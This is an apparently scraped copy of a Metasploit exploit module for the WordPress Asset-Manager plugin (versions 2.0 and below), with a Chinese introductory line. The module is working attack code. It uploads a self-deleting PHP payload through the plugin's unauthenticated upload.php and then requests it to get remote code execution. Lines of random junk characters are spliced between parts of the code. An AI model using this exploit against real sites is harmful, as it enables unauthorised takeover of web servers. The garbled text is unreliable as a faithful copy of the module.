这个模块利用 Metasploit 漏洞库中针对 WordPress Asset-Manager 插件 2.0 及以下版本的一个漏洞：该插件的 upload.php 允许未经身份验证的用户向临时目录上传 PHP 文件，从而导致任意代码执行。
5 u1 N+ T# I) C; Q6 E1 P
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
( i1 O/ X6 I9 @8 Y ( ?* c/ {; k! |# g7 @ \
require 'msf/core'* E p9 l# j$ l5 \) X8 t
require 'msf/core/exploit/php_exe'3 C9 j. Q3 U% C6 E: V* n
& t1 B" Y7 ~* z
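class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers the module metadata and the TARGETURI option.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ]
          # NOTE(review): the listing also carried a 'URL' reference, but its address
          # was overwritten in transcription and is not reproduced here.
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Uploads a self-deleting PHP payload through the plugin's unauthenticated
  # upload.php handler, then requests the dropped file from the temp directory
  # so the web server executes it.
  #
  # Raises Exploit::Failure::UnexpectedReply when the upload response does not
  # contain the payload filename, or when the trigger request returns a
  # non-200 status.
  def exploit
    # Build the base path without mutating the string returned by target_uri.
    uri = target_uri.path
    uri += '/' unless uri.end_with?('/')
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    # The dropped file removes itself once it has run (:unlink_self).
    php_payload = get_write_exec_payload(:unlink_self => true)

    # "Filedata" is the multipart field upload.php consumes; the .php extension
    # is what makes the stored file executable by the web server.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    upload_path = "#{uri}wp-content/uploads/assets/temp/#{payload_name}"

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # Success is judged by the filename appearing in the response body; escape
    # it so the "." in ".php" is matched literally rather than as a wildcard.
    unless res && res.code == 200 && res.body =~ /#{Regexp.escape(payload_name)}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'    => upload_path,
      'method' => 'GET'
    })

    # A nil response is tolerated on purpose: a payload that takes over the
    # connection (e.g. a reverse shell) may never complete the HTTP exchange.
    if res && res.code != 200
      # The payload only unlinks itself when it runs, so a failed trigger
      # leaves the uploaded file on the target for the operator to clean up.
      print_warning("#{peer} - Payload was not executed; #{upload_path} may remain on the target")
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end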
b' R% D* N( |8 h |